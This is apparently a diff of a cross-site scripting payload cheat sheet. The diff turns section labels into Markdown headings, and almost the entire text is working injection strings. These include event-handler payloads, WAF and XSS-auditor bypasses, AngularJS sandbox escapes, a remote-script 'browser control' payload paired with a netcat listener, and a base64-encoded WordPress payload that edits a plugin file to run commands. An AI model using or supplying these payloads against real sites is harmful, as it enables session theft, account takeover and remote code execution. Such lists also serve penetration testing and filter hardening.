<EMBED SRC="data:image/svg+xml;base64,JTIwPiI8PGlmcmFtZSBzcmM9aHR0cDovL3Z1bG4tbGFiLmNvbSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSA8" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
-Flash SWF XSS
+# Flash SWF XSS
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
@@ -451,7 +451,7 @@ d="alert('XSS');\")";
eval(a+b+c+d);
-XML Schema
+# XML Schema
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://vuln-lab.com/xss.htc">
<xss:xss>XSS</xss:xss>
@@ -558,14 +558,14 @@ PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
ì><img title="test-xss" onmouseup="confirm(document.domain)">
-Firefox (\x09, \x0a, \x0d, \x20)
-Chrome (Any character \x01 to \x20)
+# Firefox (\x09, \x0a, \x0d, \x20)
+# Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
<img src='1' onerror='alert(0)' <
-Extra less-than characters (IE, Firefox, Chrome, Safari).
+# Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>
<style>body{background-color:expression\(alert(1))}</style>
@@ -823,43 +823,43 @@ a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototyp
<iframe/onload=import(/\\?.?/)>
-HTML Context
+# HTML Context
Tag Injection <svg onload=alert(1)>
ì><svg onload=alert(1)//
-HTML Context
+# HTML Context
Inline Injection ìonmouseover=alert(1)//
ìautofocus/onfocus=alert(1)//
-Javascript Context
+# Javascript Context
Code Injection ë-alert(1)-ë
ë-alert(1)//
-Javascript Context
+# Javascript Context
Code Injection
(escaping the escape) \í-alert(1)//
-Javascript Context
+# Javascript Context
Tag Injection
</script><svg onload=alert(1)>
-PHP_SELF Injection
+# PHP_SELF Injection
http://DOMAIN/PAGE.php/î><svg onload=alert(1)>
-Without Parenthesis
+# Without Parenthesis
<svg onload=alert`1`>
<svg onload=alert(1)>
<svg onload=alert(1)>
<svg onload=alert(1)>
-Filter Bypass
+# Filter Bypass
Alert Obfuscation
(alert)(1)
a=alert,a(1)
@@ -872,7 +872,7 @@ top[ëal\x65rtí](1)
top[8680439..toString(30)](1)
-Body Tag
+# Body Tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
@@ -886,7 +886,7 @@ Body Tag
<body onhelp=alert(1)>press F1! (MSIE)
-Miscellaneous Vectors
+# Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
@@ -898,7 +898,7 @@ Miscellaneous Vectors
<menu id=x contextmenu=x onshow=alert(1)>right click me!
-Agnostic Event Handlers
+# Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
@@ -919,19 +919,19 @@ Agnostic Event Handlers
<x contenteditable onpaste=alert(1)>paste here!
-Code Reuse
+# Code Reuse
Inline Script <script>alert(1)//
<script>alert(1)<!ñ
-Code Reuse
+# Code Reuse
Regular Script <script src=//localhost:8080/1.js>
<script src=//3334957647/1>
-Filter Bypass
-Generic Tag + Handler
-Encoding Mixed Case Spacers
+# Filter Bypass
+# Generic Tag + Handler
+# Encoding Mixed Case Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
@@ -946,7 +946,7 @@ Encoding Mixed Case Spacers
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
-Quotes Stripping Mimetism
+# Quotes Stripping Mimetism
<x 1=í1íonxxx=1
<x 1=î1?onxxx=1 <[S]x onx[S]xx=1
@@ -956,32 +956,32 @@ Quotes Stripping Mimetism
<x 1=î>î onxxx=1
<http://onxxx%3D1/
-Generic Source Breaking
+# Generic Source Breaking
<x onxxx=alert(1) 1=í
-Browser Control
+# Browser Control
<svg onload=setInterval(function(){with(document)body.
appendChild(createElement(ëscriptí)).src=í//HOST:PORTí},0)>$ while :; do printf ìj$ ì; read c; echo $c | nc -lp PORT >/dev/null; done
-Multi Reflection Double Reflection
+# Multi Reflection Double Reflection
Single Input Single Input (script-based)
ëonload=alert(1)><svg/1=í ë>alert(1)</script><script/1=í
*/alert(1)</script><script>/*
-Triple Reflection
+# Triple Reflection
Single Input Single Input (script-based)
*/alert(1)î>íonload=î/*<svg/1=í
`-alert(1)î>íonload=î`<svg/1=í */</script>í>alert(1)/*<script/1=í
-Multi Input Double Input Triple Input
+# Multi Input Double Input Triple Input
p=<svg/1=í&q=íonload=alert(1)>
p=<svg 1=í&q=íonload=í/*&r=*/alert(1)í>
-Without Event Handlers
+# Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
@@ -1002,8 +1002,8 @@ Without Event Handlers
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
-Mobile Only
-Event Handlers
+# Mobile Only
+# Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
@@ -1011,7 +1011,7 @@ Event Handlers
<body onorientationchange=alert(1)>
-Javascript Properties Functions
+# Javascript Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
@@ -1019,35 +1019,35 @@ Javascript Properties Functions
<svg onload=navigator.vibrate([500,300,100])>
-Generic Self to Regular XSS
+# Generic Self to Regular XSS
<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
-File Upload Injection in Filename
+# File Upload Injection in Filename
ì><img src=1 onerror=alert(1)>.gifInjection in Metadata
$ exiftool -Artist='î><img src=1 onerror=alert(1)>í FILENAME.jpegInjection with SVG File
<svg xmlns=îhttp://www.w3.org/2000/svgî onload=îalert(document.domain)î/>
-Injection with GIF File as Source of Script (CSP Bypass)
+# Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
-Google Chrome
-Auditor Bypass
+# Google Chrome
+# Auditor Bypass
<script src=îdata:,alert(1)//
ì><script src=data:,alert(1)//<script src=î//localhost:8080/1.js#
ì><script src=//localhost:8080/1.js#<link rel=import href=îdata:text/html,<script>alert(1)</script>
ì><link rel=import href=data:text/html,<script>alert(1)</script>
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
-Chrome < v60 beta XSS-Auditor Bypass
+# Chrome < v60 beta XSS-Auditor Bypass
<script src="data:,alert(1)%250A-->
-Other Chrome XSS-Auditor Bypasses
+# Other Chrome XSS-Auditor Bypasses
<script>alert(1)</script
@@ -1055,15 +1055,15 @@ Other Chrome XSS-Auditor Bypasses
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
-Safari XSS Vector
+# Safari XSS Vector
<script>location.href;'javascript:alert%281%29'</script>
-XSS Polyglot
+# XSS Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
-PHP File for XHR Remote Call
+# PHP File for XHR Remote Call
<?php header(ìAccess-Control-Allow-Origin: *î); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
@@ -1073,12 +1073,12 @@ Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg/onload=javascript:void(0)?void(0):void(0)?void(0):void(0)?void(0):void(0)?void(0):confirm(location)>
-Shortest PoC
+# Shortest PoC
<base href=//0>
$ while:; do echo ìalert(1)î | nc -lp80; done
-Portable WordPress RCE <script/src=îdata:,eval(atob(location.hash.slice(1)))//#
+# Portable WordPress RCE <script/src=îdata:,eval(atob(location.hash.slice(1)))//#
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
@@ -1090,13 +1090,13 @@ wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
-Invisble JS Alert
+# Invisble JS Alert
([,?,,,,??]=[]+{},[???,??,????,???,,?????,????,??????,,,?????]=[!!?]+!?+?.?)
[??+=?+?????+??????+???+??+????+??+???+?+??][??]
(?????+????+???+??+???+'`#JS!`')``
-Markdown XSS
+# Markdown XSS
[a](javascript:confirm(1))
@@ -1113,7 +1113,7 @@ Markdown XSS
[a]:(?javascript:alert(1))
-Angular JS
+# Angular JS
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@@ -1122,7 +1122,7 @@ Angular JS
eval('x=1} } };alert(1)//');
}}
-AngularJS Template Injection based XSS
+# AngularJS Template Injection based XSS
1.0.1 - 1.1.5
@@ -1220,16 +1220,16 @@ AngularJS Template Injection based XSS
{{constructor.constructor('alert(1)')()}}
-Content Security Policy (CSP) bypass via JSONP endpoints
+# Content Security Policy (CSP) bypass via JSONP endpoints
-Grab the target's CSP:
+# Grab the target's CSP:
curl -I http://example.com | grep 'Content-Security-Policy'
-Lightweight Markup Languages
+# Lightweight Markup Languages
-RubyDoc (.rdoc)
+# RubyDoc (.rdoc)
XSS[JavaScript:alert(1)]
@@ -1243,13 +1243,13 @@ reStructuredText (.rst)
__ javascript:alert(document.domain)
-Unicode characters
+# Unicode characters
Üáï<img src=a onerror=javascript:alert('test')>ÖâÄ
-Sanbox Bypasses
+# Sanbox Bypasses
{{constructor.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
@@ -1316,11 +1316,11 @@ Kona WAF (Akamai) Bypass
\');confirm(1);//
-ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
+# ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
-Wordfence XSS Bypasses
+# Wordfence XSS Bypasses
<meter onmouseover="alert(1)"
@@ -1328,7 +1328,7 @@ Wordfence XSS Bypasses
>><marquee loop=1 width=0 onfinish=alert(1)>
-Incapsula WAF Bypasses
+# Incapsula WAF Bypasses
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
@@ -1338,12 +1338,12 @@ jQuery < 3.0.0 XSS
$.get('http://sakurity.com/jqueryxss')
-In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
+# In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
- Find any cross domain requests to untrusted domains which may inadvertently execute script.
- Find any requests to trusted API endpoints where script can be injected into data sources.
+ # Find any cross domain requests to untrusted domains which may inadvertently execute script.
+ # Find any requests to trusted API endpoints where script can be injected into data sources.
-URL verification bypasses (works without 	 too)
+# URL verification bypasses (works without 	 too)
javas	cript://www.google.com/%0Aalert(1)
@@ -1352,7 +1352,7 @@ javas	cript://www.google.com/%0Aalert(1)
-Signal Messenger Payloads
+# Signal Messenger Payloads
http://testdomain/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PENTEST
http://testdomain/?p=%3d%3Ciframe%20src=\\DESKTOP-[LOCALPATH]\Temp\rce.html%3E
@@ -1372,7 +1372,7 @@ http://testdomain/?p=%3Cform%20method='POST'%20action='https://domain.de/url'%3E
-Waf Engine Bypass
+# Waf Engine Bypass
<svg onload\r\n=$.globalEval("al"+"ert()");>
<img onload\r\n=$.globalEval("al"+"ert()");>
<iframe src="\\" onload\r\n=$.globalEval("al"+"ert()");>
]]> |